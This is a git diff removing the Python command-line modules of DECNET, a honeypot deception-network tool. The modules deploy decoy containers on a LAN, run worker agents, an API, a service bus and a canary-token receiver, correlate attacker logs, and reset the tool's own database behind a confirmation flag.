raise RuntimeError(
|
||||
f"Not enough free IPs in {subnet_cidr} while assigning IP for '{spec.name}'."
|
||||
)
|
||||
|
||||
if spec.services:
|
||||
known = set(_all_service_names())
|
||||
unknown = [s for s in spec.services if s not in known]
|
||||
if unknown:
|
||||
console.print(
|
||||
f"[red]Unknown service(s) in [{spec.name}]: {unknown}. "
|
||||
f"Available: {_all_service_names()}[/]"
|
||||
)
|
||||
raise typer.Exit(1)
|
||||
svc_list = spec.services
|
||||
elif arch:
|
||||
svc_list = list(arch.services)
|
||||
elif randomize:
|
||||
svc_pool = _all_service_names()
|
||||
count = random.randint(1, min(3, len(svc_pool)))
|
||||
svc_list = random.sample(svc_pool, count)
|
||||
else:
|
||||
console.print(
|
||||
f"[red]Decky '[{spec.name}]' has no services= in config. "
|
||||
"Add services=, archetype=, or use --randomize-services.[/]"
|
||||
)
|
||||
raise typer.Exit(1)
|
||||
|
||||
# nmap_os priority: explicit INI key > archetype default > "linux"
|
||||
resolved_nmap_os = spec.nmap_os or (arch.nmap_os if arch else "linux")
|
||||
deckies.append(DeckyConfig(
|
||||
name=spec.name,
|
||||
ip=ip,
|
||||
services=svc_list,
|
||||
distro=distro.slug,
|
||||
base_image=distro.image,
|
||||
build_base=distro.build_base,
|
||||
hostname=hostname,
|
||||
archetype=arch.slug if arch else None,
|
||||
service_config=spec.service_config,
|
||||
nmap_os=resolved_nmap_os,
|
||||
))
|
||||
return deckies
|
||||
|
||||
|
||||
@app.command()
|
||||
def deploy(
|
||||
mode: str = typer.Option("unihost", "--mode", "-m", help="Deployment mode: unihost | swarm"),
|
||||
deckies: Optional[int] = typer.Option(None, "--deckies", "-n", help="Number of deckies to deploy (required without --config)", min=1),
|
||||
interface: Optional[str] = typer.Option(None, "--interface", "-i", help="Host NIC (auto-detected if omitted)"),
|
||||
subnet: Optional[str] = typer.Option(None, "--subnet", help="LAN subnet CIDR (auto-detected if omitted)"),
|
||||
ip_start: Optional[str] = typer.Option(None, "--ip-start", help="First decky IP (auto if omitted)"),
|
||||
services: Optional[str] = typer.Option(None, "--services", help="Comma-separated services, e.g. ssh,smb,rdp"),
|
||||
randomize_services: bool = typer.Option(False, "--randomize-services", help="Assign random services to each decky"),
|
||||
distro: Optional[str] = typer.Option(None, "--distro", help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9"),
|
||||
randomize_distros: bool = typer.Option(False, "--randomize-distros", help="Assign a random distro to each decky"),
|
||||
log_target: Optional[str] = typer.Option(None, "--log-target", help="Forward logs to ip:port (e.g. 192.168.1.5:5140)"),
|
||||
log_file: Optional[str] = typer.Option(None, "--log-file", help="Write RFC 5424 syslog to this path inside containers (e.g. /var/log/decnet/decnet.log)"),
|
||||
archetype_name: Optional[str] = typer.Option(None, "--archetype", "-a", help="Machine archetype slug (e.g. linux-server, windows-workstation)"),
|
||||
dry_run: bool = typer.Option(False, "--dry-run", help="Generate compose file without starting containers"),
|
||||
no_cache: bool = typer.Option(False, "--no-cache", help="Force rebuild all images, ignoring Docker layer cache"),
|
||||
ipvlan: bool = typer.Option(False, "--ipvlan", help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)"),
|
||||
config_file: Optional[str] = typer.Option(None, "--config", "-c", help="Path to INI config file"),
|
||||
) -> None:
|
||||
"""Deploy deckies to the LAN."""
|
||||
if mode not in ("unihost", "swarm"):
|
||||
console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
# ------------------------------------------------------------------ #
|
||||
# Config-file path #
|
||||
# ------------------------------------------------------------------ #
|
||||
if config_file:
|
||||
try:
|
||||
ini = load_ini(config_file)
|
||||
except FileNotFoundError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
# CLI flags override INI values when explicitly provided
|
||||
iface = interface or ini.interface or detect_interface()
|
||||
subnet_cidr = subnet or ini.subnet
|
||||
effective_gateway = ini.gateway
|
||||
if subnet_cidr is None:
|
||||
subnet_cidr, effective_gateway = detect_subnet(iface)
|
||||
elif effective_gateway is None:
|
||||
_, effective_gateway = detect_subnet(iface)
|
||||
|
||||
host_ip = get_host_ip(iface)
|
||||
console.print(f"[dim]Config:[/] {config_file} [dim]Interface:[/] {iface} "
|
||||
f"[dim]Subnet:[/] {subnet_cidr} [dim]Gateway:[/] {effective_gateway} "
|
||||
f"[dim]Host IP:[/] {host_ip}")
|
||||
|
||||
# Register bring-your-own services from INI before validation
|
||||
if ini.custom_services:
|
||||
from decnet.custom_service import CustomService
|
||||
from decnet.services.registry import register_custom_service
|
||||
for cs in ini.custom_services:
|
||||
register_custom_service(
|
||||
CustomService(
|
||||
name=cs.name,
|
||||
image=cs.image,
|
||||
exec_cmd=cs.exec_cmd,
|
||||
ports=cs.ports,
|
||||
)
|
||||
)
|
||||
|
||||
effective_log_target = log_target or ini.log_target
|
||||
effective_log_file = log_file
|
||||
decky_configs = _build_deckies_from_ini(
|
||||
ini, subnet_cidr, effective_gateway, host_ip, randomize_services
|
||||
)
|
||||
# ------------------------------------------------------------------ #
|
||||
# Classic CLI path #
|
||||
# ------------------------------------------------------------------ #
|
||||
else:
|
||||
if deckies is None:
|
||||
console.print("[red]--deckies is required when --config is not used.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
services_list = [s.strip() for s in services.split(",")] if services else None
|
||||
if services_list:
|
||||
known = set(_all_service_names())
|
||||
unknown = [s for s in services_list if s not in known]
|
||||
if unknown:
|
||||
console.print(f"[red]Unknown service(s): {unknown}. Available: {_all_service_names()}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
# Resolve archetype if provided
|
||||
arch: Archetype | None = None
|
||||
if archetype_name:
|
||||
try:
|
||||
arch = get_archetype(archetype_name)
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
if not services_list and not randomize_services and not arch:
|
||||
console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
iface = interface or detect_interface()
|
||||
if subnet is None:
|
||||
subnet_cidr, effective_gateway = detect_subnet(iface)
|
||||
else:
|
||||
subnet_cidr = subnet
|
||||
_, effective_gateway = detect_subnet(iface)
|
||||
|
||||
host_ip = get_host_ip(iface)
|
||||
console.print(f"[dim]Interface:[/] {iface} [dim]Subnet:[/] {subnet_cidr} "
|
||||
f"[dim]Gateway:[/] {effective_gateway} [dim]Host IP:[/] {host_ip}")
|
||||
|
||||
distros_list = [d.strip() for d in distro.split(",")] if distro else None
|
||||
if distros_list:
|
||||
try:
|
||||
for slug in distros_list:
|
||||
get_distro(slug)
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
|
||||
decky_configs = _build_deckies(
|
||||
deckies, ips, services_list, randomize_services,
|
||||
distros_explicit=distros_list, randomize_distros=randomize_distros,
|
||||
archetype=arch,
|
||||
)
|
||||
effective_log_target = log_target
|
||||
effective_log_file = log_file
|
||||
|
||||
config = DecnetConfig(
|
||||
mode=mode,
|
||||
interface=iface,
|
||||
subnet=subnet_cidr,
|
||||
gateway=effective_gateway,
|
||||
deckies=decky_configs,
|
||||
log_target=effective_log_target,
|
||||
log_file=effective_log_file,
|
||||
ipvlan=ipvlan,
|
||||
)
|
||||
|
||||
if effective_log_target and not dry_run:
|
||||
from decnet.logging.forwarder import probe_log_target
|
||||
if not probe_log_target(effective_log_target):
|
||||
console.print(f"[yellow]Warning: log target {effective_log_target} is unreachable. "
|
||||
"Logs will be lost if it stays down.[/]")
|
||||
|
||||
from decnet.deployer import deploy as _deploy
|
||||
_deploy(config, dry_run=dry_run, no_cache=no_cache)
|
||||
|
||||
|
||||
@app.command()
|
||||
def status() -> None:
|
||||
"""Show running deckies and their status."""
|
||||
from decnet.deployer import status as _status
|
||||
_status()
|
||||
|
||||
|
||||
@app.command()
|
||||
def teardown(
|
||||
all_: bool = typer.Option(False, "--all", help="Tear down all deckies and remove network"),
|
||||
id_: Optional[str] = typer.Option(None, "--id", help="Tear down a specific decky by name"),
|
||||
) -> None:
|
||||
"""Stop and remove deckies."""
|
||||
if not all_ and not id_:
|
||||
console.print("[red]Specify --all or --id <name>.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
from decnet.deployer import teardown as _teardown
|
||||
_teardown(decky_id=id_)
|
||||
|
||||
|
||||
@app.command(name="services")
|
||||
def list_services() -> None:
|
||||
"""List all registered honeypot service plugins."""
|
||||
svcs = all_services()
|
||||
table = Table(title="Available Services", show_lines=True)
|
||||
table.add_column("Name", style="bold cyan")
|
||||
table.add_column("Ports")
|
||||
table.add_column("Image")
|
||||
for name, svc in sorted(svcs.items()):
|
||||
table.add_row(name, ", ".join(str(p) for p in svc.ports), svc.default_image)
|
||||
console.print(table)
|
||||
|
||||
|
||||
@app.command(name="distros")
|
||||
def list_distros() -> None:
|
||||
"""List all available OS distro profiles for deckies."""
|
||||
table = Table(title="Available Distro Profiles", show_lines=True)
|
||||
table.add_column("Slug", style="bold cyan")
|
||||
table.add_column("Display Name")
|
||||
table.add_column("Docker Image", style="dim")
|
||||
for slug, profile in sorted(all_distros().items()):
|
||||
table.add_row(slug, profile.display_name, profile.image)
|
||||
console.print(table)
|
||||
|
||||
|
||||
@app.command(name="correlate")
|
||||
def correlate(
|
||||
log_file: Optional[str] = typer.Option(None, "--log-file", "-f", help="Path to DECNET syslog file to analyse"),
|
||||
min_deckies: int = typer.Option(2, "--min-deckies", "-m", help="Minimum number of distinct deckies an IP must touch to be reported"),
|
||||
output: str = typer.Option("table", "--output", "-o", help="Output format: table | json | syslog"),
|
||||
emit_syslog: bool = typer.Option(False, "--emit-syslog", help="Also print traversal events as RFC 5424 lines (for SIEM piping)"),
|
||||
) -> None:
|
||||
"""Analyse logs for cross-decky traversals and print the attacker movement graph."""
|
||||
import sys
|
||||
import json as _json
|
||||
from pathlib import Path
|
||||
from decnet.correlation.engine import CorrelationEngine
|
||||
|
||||
engine = CorrelationEngine()
|
||||
|
||||
if log_file:
|
||||
path = Path(log_file)
|
||||
if not path.exists():
|
||||
console.print(f"[red]Log file not found: {log_file}[/]")
|
||||
raise typer.Exit(1)
|
||||
engine.ingest_file(path)
|
||||
elif not sys.stdin.isatty():
|
||||
for line in sys.stdin:
|
||||
engine.ingest(line)
|
||||
else:
|
||||
console.print("[red]Provide --log-file or pipe log data via stdin.[/]")
|
||||
raise typer.Exit(1)
|
||||
|
||||
traversals = engine.traversals(min_deckies)
|
||||
|
||||
if output == "json":
|
||||
console.print_json(_json.dumps(engine.report_json(min_deckies), indent=2))
|
||||
elif output == "syslog":
|
||||
for line in engine.traversal_syslog_lines(min_deckies):
|
||||
typer.echo(line)
|
||||
else:
|
||||
if not traversals:
|
||||
console.print(
|
||||
f"[yellow]No traversals detected "
|
||||
f"(min_deckies={min_deckies}, events_indexed={engine.events_indexed}).[/]"
|
||||
)
|
||||
else:
|
||||
console.print(engine.report_table(min_deckies))
|
||||
console.print(
|
||||
f"[dim]Parsed {engine.lines_parsed} lines · "
|
||||
f"indexed {engine.events_indexed} events · "
|
||||
f"{len(engine.all_attackers())} unique IPs · "
|
||||
f"[bold]{len(traversals)}[/] traversal(s)[/]"
|
||||
)
|
||||
|
||||
if emit_syslog:
|
||||
for line in engine.traversal_syslog_lines(min_deckies):
|
||||
typer.echo(line)
|
||||
|
||||
|
||||
@app.command(name="archetypes")
|
||||
def list_archetypes() -> None:
|
||||
"""List all machine archetype profiles."""
|
||||
table = Table(title="Machine Archetypes", show_lines=True)
|
||||
table.add_column("Slug", style="bold cyan")
|
||||
table.add_column("Display Name")
|
||||
table.add_column("Default Services", style="green")
|
||||
table.add_column("Description", style="dim")
|
||||
for slug, arch in sorted(all_archetypes().items()):
|
||||
table.add_row(
|
||||
slug,
|
||||
arch.display_name,
|
||||
", ".join(arch.services),
|
||||
arch.description,
|
||||
)
|
||||
console.print(table)
|
||||
@@ -1,90 +0,0 @@
|
||||
"""
|
||||
DECNET CLI — entry point for all commands.
|
||||
|
||||
Usage:
|
||||
decnet deploy --mode unihost --deckies 5 --randomize-services
|
||||
decnet status
|
||||
decnet teardown [--all | --id decky-01]
|
||||
decnet services
|
||||
|
||||
Layout: each command module exports ``register(app)`` which attaches its
|
||||
commands to the passed Typer app. ``__init__.py`` builds the root app,
|
||||
calls every module's ``register`` in order, then runs the master-only
|
||||
gate. The gate must fire LAST so it sees the fully-populated dispatch
|
||||
table before filtering.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import (
|
||||
agent,
|
||||
api,
|
||||
bus,
|
||||
canary,
|
||||
db,
|
||||
deploy,
|
||||
forwarder,
|
||||
geoip,
|
||||
init,
|
||||
inventory,
|
||||
lifecycle,
|
||||
listener,
|
||||
orchestrator,
|
||||
profiler,
|
||||
realism,
|
||||
reconciler,
|
||||
sniffer,
|
||||
swarm,
|
||||
swarmctl,
|
||||
topology,
|
||||
updater,
|
||||
web,
|
||||
webhook,
|
||||
workers,
|
||||
)
|
||||
from .gating import _gate_commands_by_mode
|
||||
from .utils import console as console, log as log
|
||||
|
||||
app = typer.Typer(
|
||||
name="decnet",
|
||||
help="Deploy a deception network of honeypot deckies on your LAN.",
|
||||
no_args_is_help=True,
|
||||
)
|
||||
|
||||
# Order matches the old flat layout so `decnet --help` reads the same.
|
||||
for _mod in (
|
||||
api, swarmctl, agent, updater, listener, forwarder,
|
||||
swarm,
|
||||
deploy, lifecycle, workers, inventory,
|
||||
web, profiler, orchestrator, realism, reconciler, sniffer, db,
|
||||
topology, bus, geoip, init, webhook, canary,
|
||||
):
|
||||
_mod.register(app)
|
||||
|
||||
_gate_commands_by_mode(app)
|
||||
|
||||
# Backwards-compat re-exports. Tests and third-party tooling import these
|
||||
# directly from ``decnet.cli``; the refactor must keep them resolvable.
|
||||
from .db import _db_reset_mysql_async # noqa: E402,F401
|
||||
from .gating import ( # noqa: E402,F401
|
||||
MASTER_ONLY_COMMANDS,
|
||||
MASTER_ONLY_GROUPS,
|
||||
_agent_mode_active,
|
||||
_require_master_mode,
|
||||
)
|
||||
from .utils import ( # noqa: E402,F401
|
||||
_daemonize,
|
||||
_http_request,
|
||||
_is_running,
|
||||
_kill_all_services,
|
||||
_pid_dir,
|
||||
_service_registry,
|
||||
_spawn_detached,
|
||||
_swarmctl_base_url,
|
||||
)
|
||||
|
||||
|
||||
if __name__ == "__main__": # pragma: no cover
|
||||
app()
|
||||
@@ -1,64 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import pathlib as _pathlib
|
||||
import sys as _sys
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def agent(
|
||||
port: int = typer.Option(8765, "--port", help="Port for the worker agent"),
|
||||
host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the worker agent"), # nosec B104
|
||||
agent_dir: Optional[str] = typer.Option(None, "--agent-dir", help="Worker cert bundle dir (default: ~/.decnet/agent, expanded under the running user's HOME — set this when running as sudo/root)"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
no_forwarder: bool = typer.Option(False, "--no-forwarder", help="Do not auto-spawn the log forwarder alongside the agent"),
|
||||
) -> None:
|
||||
"""Run the DECNET SWARM worker agent (requires a cert bundle in ~/.decnet/agent/).
|
||||
|
||||
By default, `decnet agent` auto-spawns `decnet forwarder` as a fully-
|
||||
detached sibling process so worker logs start flowing to the master
|
||||
without a second manual invocation. The forwarder survives agent
|
||||
restarts and crashes — if it dies on its own, restart it manually
|
||||
with `decnet forwarder --daemon …`. Pass --no-forwarder to skip.
|
||||
"""
|
||||
from decnet.agent import server as _agent_server
|
||||
from decnet.env import DECNET_SWARM_MASTER_HOST, DECNET_AGENT_LOG_FILE
|
||||
from decnet.swarm import pki as _pki
|
||||
|
||||
resolved_dir = _pathlib.Path(agent_dir) if agent_dir else _pki.DEFAULT_AGENT_DIR
|
||||
|
||||
if daemon:
|
||||
log.info("agent daemonizing host=%s port=%d", host, port)
|
||||
_utils._daemonize()
|
||||
|
||||
if not no_forwarder and DECNET_SWARM_MASTER_HOST:
|
||||
fw_argv = [
|
||||
_sys.executable, "-m", "decnet", "forwarder",
|
||||
"--master-host", DECNET_SWARM_MASTER_HOST,
|
||||
"--master-port", str(int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))),
|
||||
"--agent-dir", str(resolved_dir),
|
||||
"--log-file", str(DECNET_AGENT_LOG_FILE),
|
||||
"--daemon",
|
||||
]
|
||||
try:
|
||||
pid = _utils._spawn_detached(fw_argv, _utils._pid_dir() / "forwarder.pid")
|
||||
log.info("agent auto-spawned forwarder pid=%d master=%s", pid, DECNET_SWARM_MASTER_HOST)
|
||||
console.print(f"[dim]Auto-spawned forwarder (pid {pid}) → {DECNET_SWARM_MASTER_HOST}.[/]")
|
||||
except Exception as e: # noqa: BLE001
|
||||
log.warning("agent could not auto-spawn forwarder: %s", e)
|
||||
console.print(f"[yellow]forwarder auto-spawn skipped: {e}[/]")
|
||||
elif not no_forwarder:
|
||||
log.info("agent skipping forwarder auto-spawn (DECNET_SWARM_MASTER_HOST unset)")
|
||||
|
||||
log.info("agent command invoked host=%s port=%d dir=%s", host, port, resolved_dir)
|
||||
console.print(f"[green]Starting DECNET worker agent on {host}:{port} (mTLS)...[/]")
|
||||
rc = _agent_server.run(host, port, agent_dir=resolved_dir)
|
||||
if rc != 0:
|
||||
raise typer.Exit(rc)
|
||||
@@ -1,53 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command()
|
||||
def api(
|
||||
port: int = typer.Option(DECNET_API_PORT, "--port", help="Port for the backend API"),
|
||||
host: str = typer.Option(DECNET_API_HOST, "--host", help="Host IP for the backend API"),
|
||||
log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", help="Path to the DECNET log file to monitor"),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
|
||||
workers: int = typer.Option(1, "--workers", "-w", min=1, help="Number of uvicorn worker processes"),
|
||||
) -> None:
|
||||
"""Run the DECNET API and Web Dashboard in standalone mode."""
|
||||
_require_master_mode("api")
|
||||
if daemon:
|
||||
log.info("API daemonizing host=%s port=%d workers=%d", host, port, workers)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("API command invoked host=%s port=%d workers=%d", host, port, workers)
|
||||
console.print(f"[green]Starting DECNET API on {host}:{port} (workers={workers})...[/]")
|
||||
_env: dict[str, str] = os.environ.copy()
|
||||
_env["DECNET_INGEST_LOG_FILE"] = str(log_file)
|
||||
_cmd = [sys.executable, "-m", "uvicorn", "decnet.web.api:app",
|
||||
"--host", host, "--port", str(port), "--workers", str(workers)]
|
||||
try:
|
||||
proc = subprocess.Popen(_cmd, env=_env, start_new_session=True) # nosec B603 B404
|
||||
try:
|
||||
proc.wait()
|
||||
except KeyboardInterrupt:
|
||||
try:
|
||||
os.killpg(proc.pid, signal.SIGTERM)
|
||||
try:
|
||||
proc.wait(timeout=10)
|
||||
except subprocess.TimeoutExpired:
|
||||
os.killpg(proc.pid, signal.SIGKILL)
|
||||
proc.wait()
|
||||
except ProcessLookupError:
|
||||
pass
|
||||
except (FileNotFoundError, subprocess.SubprocessError):
|
||||
console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
|
||||
@@ -1,45 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="bus")
|
||||
def bus_cmd(
|
||||
socket_path: str = typer.Option(
|
||||
None, "--socket", "-s",
|
||||
help="UNIX socket path (defaults to DECNET_BUS_SOCKET env var, "
|
||||
"then /run/decnet/bus.sock, then ~/.decnet/bus.sock).",
|
||||
),
|
||||
group: str = typer.Option(
|
||||
"decnet", "--group", "-g",
|
||||
help="POSIX group to chown the socket to (falls back to process "
|
||||
"group if the named group does not exist).",
|
||||
),
|
||||
heartbeat: int = typer.Option(
|
||||
10, "--heartbeat", "-H",
|
||||
help="Seconds between system.bus.health heartbeat events.",
|
||||
),
|
||||
daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process."),
|
||||
) -> None:
|
||||
"""Run the DECNET ServiceBus worker (host-local UNIX-socket pub/sub)."""
|
||||
import asyncio
|
||||
from decnet.bus.factory import _default_socket_path
|
||||
from decnet.bus.worker import bus_worker
|
||||
|
||||
resolved = socket_path or _default_socket_path()
|
||||
|
||||
if daemon:
|
||||
log.info("bus daemonizing socket=%s", resolved)
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("bus starting socket=%s group=%s heartbeat=%ds", resolved, group, heartbeat)
|
||||
console.print(f"[bold cyan]Bus starting[/] (socket: {resolved}, heartbeat: {heartbeat}s)")
|
||||
|
||||
try:
|
||||
asyncio.run(bus_worker(resolved, group=group, heartbeat_interval=heartbeat))
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Bus stopped.[/]")
|
||||
@@ -1,42 +0,0 @@
|
||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||
|
||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
||||
:func:`decnet.canary.worker.run`.
|
||||
|
||||
Not master-only — any host that hosts deckies can run its own
|
||||
canary worker (the bus events stay local; the webhook worker on
|
||||
each host fans them out to SIEMs independently per the design
|
||||
in ``development/let-s-move-to-the-enumerated-pike.md``).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="canary")
|
||||
def canary_cmd(
|
||||
daemon: bool = typer.Option(
|
||||
False, "--daemon", "-d", help="Detach to background as a daemon process",
|
||||
),
|
||||
) -> None:
|
||||
"""Run the canary HTTP + DNS callback receiver."""
|
||||
import asyncio
|
||||
|
||||
from decnet.canary.worker import run
|
||||
|
||||
if daemon:
|
||||
log.info("canary daemonizing")
|
||||
_utils._daemonize()
|
||||
|
||||
log.info("canary starting")
|
||||
console.print("[bold cyan]Canary callback receiver starting[/]")
|
||||
|
||||
try:
|
||||
asyncio.run(run())
|
||||
except KeyboardInterrupt:
|
||||
console.print("\n[yellow]Canary worker stopped.[/]")
|
||||
141
decnet/cli/db.py
141
decnet/cli/db.py
@@ -1,141 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def _decnet_tables() -> tuple[str, ...]:
|
||||
"""Every DECNET-managed table, ordered child-first for DROP safety.
|
||||
|
||||
Source is ``SQLModel.metadata.sorted_tables`` — the same registry that
|
||||
drives ``create_all`` — so adding a new model automatically enrolls
|
||||
its table in ``db-reset`` with no manual step. (Previous hardcoded
|
||||
list drifted multiple times; ``webhook_subscriptions`` /
|
||||
``session_profile`` / ``smtp_targets`` all got missed.)
|
||||
|
||||
``sorted_tables`` returns parent-first (topological order that makes
|
||||
``CREATE`` safe). For ``DROP`` we need the reverse: children first,
|
||||
so FK constraints drop before their parents. ``SET FOREIGN_KEY_CHECKS
|
||||
= 0`` below makes this order-insensitive for MySQL, but the reverse
|
||||
order keeps the code honest for any backend that doesn't support
|
||||
disabling the FK check.
|
||||
"""
|
||||
from sqlmodel import SQLModel
|
||||
# Importing the models package registers every table on SQLModel.metadata.
|
||||
import decnet.web.db.models # noqa: F401
|
||||
|
||||
return tuple(
|
||||
t.name for t in reversed(SQLModel.metadata.sorted_tables)
|
||||
)
|
||||
|
||||
|
||||
async def _db_reset_mysql_async(dsn: str, mode: str, confirm: bool) -> None:
|
||||
"""Inspect + (optionally) wipe a MySQL database. Pulled out of the CLI
|
||||
wrapper so tests can drive it without spawning a Typer runner."""
|
||||
from urllib.parse import urlparse
|
||||
from sqlalchemy import text
|
||||
from sqlalchemy.ext.asyncio import create_async_engine
|
||||
|
||||
db_name = urlparse(dsn).path.lstrip("/") or "(default)"
|
||||
engine = create_async_engine(dsn)
|
||||
tables = _decnet_tables()
|
||||
try:
|
||||
rows: dict[str, int] = {}
|
||||
async with engine.connect() as conn:
|
||||
for tbl in tables:
|
||||
try:
|
||||
result = await conn.execute(text(f"SELECT COUNT(*) FROM `{tbl}`")) # nosec B608
|
||||
rows[tbl] = result.scalar() or 0
|
||||
except Exception: # noqa: BLE001 — ProgrammingError for missing table varies by driver
|
||||
rows[tbl] = -1
|
||||
|
||||
summary = Table(title=f"DECNET MySQL reset — database `{db_name}` (mode={mode})")
|
||||
summary.add_column("Table", style="cyan")
|
||||
summary.add_column("Rows", justify="right")
|
||||
for tbl, count in rows.items():
|
||||
summary.add_row(tbl, "[dim]missing[/]" if count < 0 else f"{count:,}")
|
||||
console.print(summary)
|
||||
|
||||
if not confirm:
|
||||
console.print(
|
||||
"[yellow]Dry-run only. Re-run with [bold]--i-know-what-im-doing[/] "
|
||||
"to actually execute.[/]"
|
||||
)
|
||||
return
|
||||
|
||||
async with engine.begin() as conn:
|
||||
await conn.execute(text("SET FOREIGN_KEY_CHECKS = 0"))
|
||||
for tbl in tables:
|
||||
if rows.get(tbl, -1) < 0:
|
||||
continue
|
||||
if mode == "truncate":
|
||||
await conn.execute(text(f"TRUNCATE TABLE `{tbl}`"))
|
||||
console.print(f"[green]✓ TRUNCATE {tbl}[/]")
|
||||
else:
|
||||
await conn.execute(text(f"DROP TABLE `{tbl}`"))
|
||||
console.print(f"[green]✓ DROP TABLE {tbl}[/]")
|
||||
await conn.execute(text("SET FOREIGN_KEY_CHECKS = 1"))
|
||||
|
||||
console.print(f"[bold green]Done. Database `{db_name}` reset ({mode}).[/]")
|
||||
finally:
|
||||
await engine.dispose()
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
|
||||
@app.command(name="db-reset")
|
||||
def db_reset(
|
||||
i_know: bool = typer.Option(
|
||||
False,
|
||||
"--i-know-what-im-doing",
|
||||
help="Required to actually execute. Without it, the command runs in dry-run mode.",
|
||||
),
|
||||
mode: str = typer.Option(
|
||||
"truncate",
|
||||
"--mode",
|
||||
help="truncate (wipe rows, keep schema) | drop-tables (DROP TABLE for each DECNET table)",
|
||||
),
|
||||
url: Optional[str] = typer.Option(
|
||||
None,
|
||||
"--url",
|
||||
help="Override DECNET_DB_URL for this invocation (e.g. when cleanup needs admin creds).",
|
||||
),
|
||||
) -> None:
|
||||
"""Wipe the MySQL database used by the DECNET dashboard.
|
||||
|
||||
Destructive. Runs dry by default — pass --i-know-what-im-doing to commit.
|
||||
Only supported against MySQL; refuses to operate on SQLite.
|
||||
"""
|
||||
import asyncio
|
||||
import os
|
||||
|
||||
if mode not in ("truncate", "drop-tables"):
|
||||
console.print(f"[red]Invalid --mode '{mode}'. Expected: truncate | drop-tables.[/]")
|
||||
raise typer.Exit(2)
|
||||
|
||||
db_type = os.environ.get("DECNET_DB_TYPE", "sqlite").lower()
|
||||
if db_type != "mysql":
|
||||
console.print(
|
||||
f"[red]db-reset is MySQL-only (DECNET_DB_TYPE='{db_type}'). "
|
||||
f"For SQLite, just delete the decnet.db file.[/]"
|
||||
)
|
||||
raise typer.Exit(2)
|
||||
|
||||
dsn = url or os.environ.get("DECNET_DB_URL")
|
||||
if not dsn:
|
||||
from decnet.web.db.mysql.database import build_mysql_url
|
||||
try:
|
||||
dsn = build_mysql_url()
|
||||
except ValueError as e:
|
||||
console.print(f"[red]{e}[/]")
|
||||
raise typer.Exit(2) from e
|
||||
|
||||
log.info("db-reset invoked mode=%s confirm=%s", mode, i_know)
|
||||
try:
|
||||
asyncio.run(_db_reset_mysql_async(dsn, mode=mode, confirm=i_know))
|
||||
except Exception as e: # noqa: BLE001
|
||||
console.print(f"[red]db-reset failed: {e}[/]")
|
||||
raise typer.Exit(1) from e
|
||||
@@ -1,307 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from decnet.archetypes import Archetype, get_archetype
|
||||
from decnet.config import DecnetConfig
|
||||
from decnet.distros import get_distro
|
||||
from decnet.env import DECNET_API_HOST, DECNET_INGEST_LOG_FILE
|
||||
from decnet.fleet import all_service_names, build_deckies, build_deckies_from_ini
|
||||
from decnet.ini_loader import load_ini
|
||||
from decnet.network import detect_interface, detect_subnet, allocate_ips, get_host_ip
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def _deploy_swarm(config: "DecnetConfig", *, dry_run: bool, no_cache: bool) -> None:
|
||||
"""Shard deckies round-robin across enrolled workers and POST to swarmctl."""
|
||||
base = _utils._swarmctl_base_url(None)
|
||||
